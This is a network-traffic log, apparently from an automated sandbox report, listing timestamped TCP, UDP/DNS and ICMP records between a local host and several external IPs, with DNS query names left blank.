Jan 14, 2025 18:22:40.228429079 CET | 49831 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.228449106 CET | 443 | 49831 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.275561094 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.275640011 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.275727034 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.275985956 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.276021957 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.885879993 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.886286974 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.886357069 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.887265921 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.887350082 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.887809038 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.887876987 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.887984037 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:40.888003111 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:40.930291891 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:41.221266985 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:41.221334934 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:41.221396923 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:41.222395897 CET | 49839 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:41.222414970 CET | 443 | 49839 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:50.720947981 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:50.720997095 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:50.721080065 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:50.724090099 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:50.724103928 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.196352005 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.196633101 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.196650028 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.196975946 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.197267056 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.197321892 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.197405100 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.243326902 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.361154079 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.361222029 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.361340046 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.363733053 CET | 49909 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.363753080 CET | 443 | 49909 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.366297960 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:51.366324902 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:51.366792917 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:51.367182970 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:51.367197037 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:51.367670059 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.367708921 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.367767096 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.367917061 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.367928028 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.825015068 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.825311899 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.825337887 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.825623989 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.825925112 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.825984955 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.826191902 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.867341995 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.959830999 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.959923029 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.960017920 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.960949898 CET | 49912 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:22:51.960971117 CET | 443 | 49912 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:22:51.978560925 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:51.978809118 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:51.978840113 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:51.979173899 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:51.979468107 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:51.979526997 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:51.979587078 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.023358107 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.267667055 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.267745018 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.267811060 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.268559933 CET | 49911 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.268600941 CET | 443 | 49911 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.271605968 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.271647930 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.271718025 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.271934032 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.271950006 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.904042006 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.904373884 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.904438019 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.904764891 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.905078888 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.905150890 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:52.905232906 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:52.951328993 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:53.230820894 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:53.230891943 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:22:53.230987072 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:53.232618093 CET | 49918 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:22:53.232661009 CET | 443 | 49918 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:05.787764072 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:05.787775040 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:05.787846088 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:05.788234949 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:05.788247108 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.259368896 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.264710903 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.264780998 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.265402079 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.305799961 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.314048052 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.314141989 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.320521116 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.363337994 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.476267099 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.476339102 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.476397991 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.477155924 CET | 50000 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.477173090 CET | 443 | 50000 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.479795933 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:06.479830027 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:06.480200052 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:06.480200052 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:06.480230093 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:06.481456041 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.481503010 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.481739044 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.481800079 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.481812000 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.963252068 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.963619947 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.963634968 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.963994980 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.964390039 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:06.964447975 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:06.964631081 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:07.007332087 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:07.123666048 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.123975039 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.123984098 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.124317884 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.124641895 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.124697924 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.124799013 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.135159016 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:07.135207891 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:07.135262012 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:07.136096954 CET | 50005 | 443 | 192.168.2.6 | 104.26.12.205 |
Jan 14, 2025 18:23:07.136116982 CET | 443 | 50005 | 104.26.12.205 | 192.168.2.6 |
Jan 14, 2025 18:23:07.167344093 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.484579086 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.484766960 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.484812975 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.485965014 CET | 50004 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.485970974 CET | 443 | 50004 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.488643885 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.488666058 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:07.488734961 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.488914967 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:07.488923073 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.128253937 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.128840923 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:08.128855944 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.129360914 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.130203009 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:08.130301952 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.130354881 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:08.175327063 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.180767059 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:08.458435059 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.458508968 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:08.458904982 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:08.460571051 CET | 50006 | 443 | 192.168.2.6 | 149.154.167.220 |
Jan 14, 2025 18:23:08.460593939 CET | 443 | 50006 | 149.154.167.220 | 192.168.2.6 |
Jan 14, 2025 18:23:09.117985010 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:23:09.118000031 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:23:21.917098045 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:21.917131901 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:21.917248011 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:21.917634964 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:21.917645931 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:22.567574024 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:22.568805933 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:22.568841934 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:22.569933891 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:22.570280075 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:22.570456028 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:22.618227959 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:25.980027914 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:23:25.980242968 CET | 443 | 49715 | 34.233.109.53 | 192.168.2.6 |
Jan 14, 2025 18:23:25.980325937 CET | 49715 | 443 | 192.168.2.6 | 34.233.109.53 |
Jan 14, 2025 18:23:32.463937998 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:32.464003086 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Jan 14, 2025 18:23:32.464255095 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:33.980758905 CET | 50008 | 443 | 192.168.2.6 | 142.250.186.164 |
Jan 14, 2025 18:23:33.980799913 CET | 443 | 50008 | 142.250.186.164 | 192.168.2.6 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 18:22:17.731888056 CET | 53 | 51447 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:17.756982088 CET | 53 | 64610 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:18.743664980 CET | 53 | 61966 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:21.853024960 CET | 56923 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:21.853147030 CET | 61985 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:21.859777927 CET | 53 | 61985 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:21.860155106 CET | 53 | 56923 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:23.355478048 CET | 51366 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:23.355815887 CET | 55120 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:23.370721102 CET | 53 | 55120 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:23.377526045 CET | 53 | 51366 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:24.229125023 CET | 55875 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:24.229242086 CET | 52101 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:24.242923975 CET | 53 | 55875 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:24.392534971 CET | 53 | 52101 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:25.156393051 CET | 60287 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:25.156651020 CET | 60527 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:25.165543079 CET | 53 | 60527 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:25.165555000 CET | 53 | 60287 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:25.219176054 CET | 53 | 56844 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:26.393668890 CET | 55622 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:26.394009113 CET | 55761 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:26.400921106 CET | 53 | 55622 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:26.401119947 CET | 53 | 55761 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:27.825103045 CET | 63434 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:27.825556040 CET | 54704 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:27.839629889 CET | 53 | 63434 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:27.842057943 CET | 53 | 54704 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:35.861057997 CET | 53 | 52769 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:38.661484957 CET | 60541 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:38.661658049 CET | 60021 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:38.668438911 CET | 53 | 60021 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:38.668883085 CET | 53 | 60541 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:39.263542891 CET | 55399 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:39.263663054 CET | 64090 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:39.265769005 CET | 53841 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:39.265917063 CET | 64839 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:39.270199060 CET | 53 | 55399 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:39.271066904 CET | 53 | 64090 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:39.272507906 CET | 53 | 53841 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:39.273425102 CET | 53 | 64839 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:40.255341053 CET | 50105 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:40.255486965 CET | 64935 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 18:22:40.262018919 CET | 53 | 50105 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:40.275082111 CET | 53 | 64935 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:22:54.580982924 CET | 53 | 61196 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:23:17.300436974 CET | 53 | 59960 | 1.1.1.1 | 192.168.2.6 |
Jan 14, 2025 18:23:17.316245079 CET | 53 | 60837 | 1.1.1.1 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Checksum | Code | Type |
---|---|---|---|---|---|
Jan 14, 2025 18:22:24.392714977 CET | 192.168.2.6 | 1.1.1.1 | c23c | (Port unreachable) | Destination Unreachable |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 14, 2025 18:22:21.853024960 CET | 192.168.2.6 | 1.1.1.1 | 0x309 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:21.853147030 CET | 192.168.2.6 | 1.1.1.1 | 0x8a37 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:23.355478048 CET | 192.168.2.6 | 1.1.1.1 | 0x7e6f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:23.355815887 CET | 192.168.2.6 | 1.1.1.1 | 0xa788 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:24.229125023 CET | 192.168.2.6 | 1.1.1.1 | 0x3bb8 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:24.229242086 CET | 192.168.2.6 | 1.1.1.1 | 0xce67 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:25.156393051 CET | 192.168.2.6 | 1.1.1.1 | 0x9107 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:25.156651020 CET | 192.168.2.6 | 1.1.1.1 | 0x9523 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:26.393668890 CET | 192.168.2.6 | 1.1.1.1 | 0xd072 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:26.394009113 CET | 192.168.2.6 | 1.1.1.1 | 0x5e89 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:27.825103045 CET | 192.168.2.6 | 1.1.1.1 | 0x861e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:27.825556040 CET | 192.168.2.6 | 1.1.1.1 | 0x306 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:38.661484957 CET | 192.168.2.6 | 1.1.1.1 | 0x3aea | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:38.661658049 CET | 192.168.2.6 | 1.1.1.1 | 0x28f2 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:39.263542891 CET | 192.168.2.6 | 1.1.1.1 | 0xc20e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:39.263663054 CET | 192.168.2.6 | 1.1.1.1 | 0x12c0 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:39.265769005 CET | 192.168.2.6 | 1.1.1.1 | 0xbbc | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:39.265917063 CET | 192.168.2.6 | 1.1.1.1 | 0xc186 | Standard query (0) | 65 | IN (0x0001) | false | |
Jan 14, 2025 18:22:40.255341053 CET | 192.168.2.6 | 1.1.1.1 | 0x7ec6 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Jan 14, 2025 18:22:40.255486965 CET | 192.168.2.6 | 1.1.1.1 | 0x5f76 | Standard query (0) | 65 | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 14, 2025 18:22:21.859777927 CET | 1.1.1.1 | 192.168.2.6 | 0x8a37 | No error (0) | 65 | IN (0x0001) | false | |||
Jan 14, 2025 18:22:21.860155106 CET | 1.1.1.1 | 192.168.2.6 | 0x309 | No error (0) | 142.250.186.164 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 34.233.109.53 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 34.235.224.68 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 34.234.192.54 | A (IP address) | IN (0x0001) | false | ||
Jan 14, 2025 18:22:23.377526045 CET | 1.1.1.1 | 192.168.2.6 | 0x7e6f | No error (0) | 44.194.192.230 | A (IP address) | IN (0x0001) | false | ||
